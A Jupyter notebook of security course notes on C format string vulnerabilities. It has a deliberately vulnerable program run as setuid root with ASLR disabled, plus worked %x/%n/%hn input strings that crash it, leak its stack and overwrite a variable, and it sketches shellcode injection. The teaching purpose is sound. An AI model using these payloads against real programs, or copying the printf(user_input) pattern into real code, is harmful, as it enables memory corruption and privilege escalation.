## <center> Format String Vulnerability </center>

### Format String

- The family of `printf` function (`printf`, `fprintf`, `sprintf`...) allows users to print out a string according to a predefined format. 
- First argument in this function is called a *format string*. 
  - Normal characters within this string will be printed out as is. 
  - Characters preceded with special annocation (`%`) will be formatted according to a predefined conversion specifier. 

In [1]:
%%writefile source/printf_example.c
#include <stdio.h>

int main() 
{
    int i=1, j=2, k=3;

    printf("Hello World \n");
    printf("Print 1 number:  %d\n", i);
    printf("Print 2 numbers: %d, %d\n", i, j);
    printf("Print 3 numbers: %d, %d, %d\n", i, j, k);
}

Writing source/printf_example.c


Run the followings:

```
$ gcc -o printf_example Computer-Security/source/printf_example.c
$ ./printf_example
```

- `printf()` accepts any number of arguments. 
- https://linux.die.net/man/3/printf
- How?

In [4]:
%%writefile source/variable_args.c
#include <stdio.h>
#include <stdarg.h>

int myprint(int Narg, ... ) 
{
  int i;
  va_list ap;                              

  va_start(ap, Narg);                      
  for(i=0; i<Narg; i++) {
    printf("%d  ", va_arg(ap, int));       
    printf("%f\n", va_arg(ap, double));    
  }
  va_end(ap);                              
}

int main() {
  myprint(1, 2, 3.5);                      
  myprint(2, 2, 3.5, 3, 4.5);              
  return 1;
}

Overwriting source/variable_args.c


```
$ gcc -o variable_args Computer-Security/source/variable_args.c
$ ./variable_args
[11/23/18]seed@VM:~$ ./variable_args
2  3.500000
2  3.500000
3  4.500000
[11/23/18]seed@VM:~$
```

- `va_start()` initiates position of `ap`
- `va_arg()` reads and returns the value that `ap` is pointing to, also advances `ap` along the way. 

Run the followings:

```
$ gcc -g -o variable_args Computer-Security/source/variable_args.c
$ gdp variable_args
gdb-peda$ break 19
gdb-peda$ run
gdb-peda$ step
gdb-peda$ info args
gdb-peda$ x/dw Narg
gdb-peda$ x/dw Narg + 1
gdb-peda$ x/fg Narg + 2
gdb-peda$ x/dw Narg + 4
gdb-peda$ x/fg Narg + 5
```

- `x`: print value at memory position
- `d`: integer, signed decimal
- `f`: floating point number
- `w`: word (four bytes)
- `g`: giant word (eight bytes)

<center> <img src="figure/format-string/1.png" width="400"/>

- `variable_args` hard-coded the types for each argument in `myprint`. 
- `printf` embeds argument types into the initial string using `format specifies (%)`. 
  - `printf` scans the format string, prints out each character encountered, until it sees a format specifier. 
  - `printf` calls `va_arg()`, which returns the corresponding value pointed to by this specifier and advances the pointer to the next argument. 

```
int id = 100, age = 25;
char *name = "Bog Smith";
printf("ID: %d, Name: %s, Age: %d\n", id, name, age);
```
<center> <img src="figure/format-string/2.png" width="400"/>

- `%d`: Treat the argument as an *int* number (use the decimal form). 
- `%x`: Treat the argument as an *unsigned int* (use the hexadecimal form). 
- `%s`: Treat the argument as a *string pointer*. 
- `%f`: Treat the argument as a *double* number. 

### Format String with Missing Optional Arguments

In [8]:
%%writefile source/missing_args.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  printf ("ID: %d, Name: %s, Age: %d\n", id, name);    
  return 1;
}

Overwriting source/missing_args.c


In [7]:
%%writefile source/missing_args_v2.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  char *statement = "ID: %d, Name: %s, Age: %d\n"; 
  printf (statement, id, name);
  return 1;
}

Writing source/missing_args_v2.c


Compile and run the above examples. What is the difference?

<center> <img src="figure/format-string/3.png" width="400"/>

**Why is this dangerous?**

```
printf(user_input)
```

```
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
```

```
sprintf(format, "%s %s", getenv("PWD"), ": %d");
printf(format, program_data);
```

Bad things can happen when you let users provide direct inputs to the format string. 

### A Vulnerable Program

In [12]:
%%writefile source/vul_format_string.c
#include <stdio.h>

void fmtstr()
{
    char input[100];
    int var = 0x11223344;                     
    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets(input, sizeof(input)-1, stdin);

    printf(input); // The vulnerable place

    printf("Data at target address: 0x%x\n",var);
}

void main() { fmtstr(); }


Overwriting source/vul_format_string.c


<center> <img src="figure/format-string/4.png" width="500"/>

Run the followings:

```
$ gcc -o vul Computer-Security/source/vul_format_string.c
$ sudo chown root vul
$ sudo chmod 4755 vul
$ sudo sysctl -w kernel.randomize_va_space=0
```

### Attack 1: Crash Program

- If we put several format specifiers in our input, we can get printf() to advance the `va_list` pointer to the places beyond the `printf()`'s stack frame. 
- If this runs into invalid address (nulll pointers, protected memory, virtual addresses not mapped to physical addresses ...), the program will crash.
- Try run `vul` with `%s%s%s` as an input. 

### Attack 2: Print out Data on the Stack

- `%x` print out the integer value pointed to by the `va_list` pointer and advanced `va_list` by four bytes. 
- How can you view what is in the program's memory using `%x` ?

### Attack 3: Change Program's Data in Memory

- All `printf()`'s format specifiers print out data, except `%n`, which writes the number of characters printed out so far into memory. 

In [15]:
%%writefile source/print_args.c
#include <stdio.h>
int main()
{
  int   i = 0;
  printf ("Hello World%n\n", &i);    
  printf ("Character Count: %d\n", i);
  return 1;
}

Overwriting source/print_args.c


When `printf()` encounters `%n`, it does the followings:

- get a value pointed to by the va_list pointer,
- treat this value as an address, and
- write to the memory at that address. 

If we need to write using `printf()`, the address of the memory needs to be on the stack. 

How do we place the desired address onto the stack?

- The vul program does print out the address location. 
- Address randomization is disabled. 
- We can save out input to a file, then *pipe* this content into `vul`:
- This needs to be done inside a normal terminal in order to view binary characters. 

```
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%x | vul
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%n | vul
```
- `.` is used for clarity purposes. 
- Changing the number of `%x` will lead to segmentation fault (`printf` tries to write with `%n` to invalid address)

- Replace **0XBFFFF304** with the corresponding output from **Target address**

<center> <img src="figure/format-string/5.png" width="500"/>

### Attack 4: Change Program's Data to a Specific Value

- We want to change `var` to `0x66887799`.
- Using `%n`, we can print out `0x66887799` characters (more than 1.72 billion in decimal). 
- This is possible using precision or width modifier. 
  - Precision modifier is written as `.number`., controls the minimum number of digits to print (using zero as fillers).
  - Width modifier has the same format, but without a decimal point. Instead of using zero, it uses empty spaces as the leading filler. 

Run the followings:

```
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.10x.%n | vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.11x.%n | vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.12x.%n | vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.13x.%n | vul
```

What do you see?



In [1]:
%%writefile source/print_alternative.c
#include <stdio.h>
int main()
{
  int   a, b, c;
  a = b = c = 0x11223344;
  
  printf ("12345%n\n", &a);
  printf ("The value of a: 0x%x\n", a);
    
  printf ("12345%hn\n", &b);
  printf ("The value of a: 0x%x\n", b);
    
  printf ("12345%hhn\n", &c);
  printf ("The value of a: 0x%x\n", c);
  return 1;
}

Writing source/print_alternative.c


Compile and run the above code. 

Is there a more efficient approach?

- Use `%hn` to modify `var` two bytes at a time. 
- The address of `var` can be broken into two parts:
  - Lower two bytes to be changed to 0x7799 (Address A)
  - Higher two bytes to be changed to 0x6688 (Address B)

- What is your `var` address? - Address B
- Add 2 to get Address A

```
$ echo $(printf "\x52\xec\xff\xbf@@@@\x50\xec\xff\xbf")_%.8x_%.8x_%.8x_%.8x%.26199x%hn_%.4368x%hn | vul
```

We count everything that got printed:

**0x6688 = 26248**
- 5 `_` characters (5)
- 12 characters from initial printf (12)
- 4 `%x` printed using 8 characters (32)
- 26199 = 26248 - (5 + 12 + 32)

**0x7799 = 30617**
- 30617 - 26248 = 4369
- 1 `_` character: 4368
- The `@@@@` is so that we can insert these 4368 characters using `%.4368`

<center> <img src="figure/format-string/6.png" width="700"/>

### Attack 5: Inject Malicious Code

- In principle, somewhat similar to buffer-overflow
  - Where is the memory location for the return address of `fmtstr()`
  - Where is initial address of the injected shellcode?
  
- We need to write the address of the injected shellcode to the location of the return address. 

<center> <img src="figure/format-string/7.png" width="400"/>

### How serious is this vulnerability?

- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=format+string+
- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-format-string-vulnerability-in-ibm-db2-tool-db2support-cve-2018-1566/

### Countermeasures

#### Developer

- Watch out for `printf` and its variances. 
- Never use user inputs as part of a format string. 

#### Compiler

- Modern compiler comes with warnings. 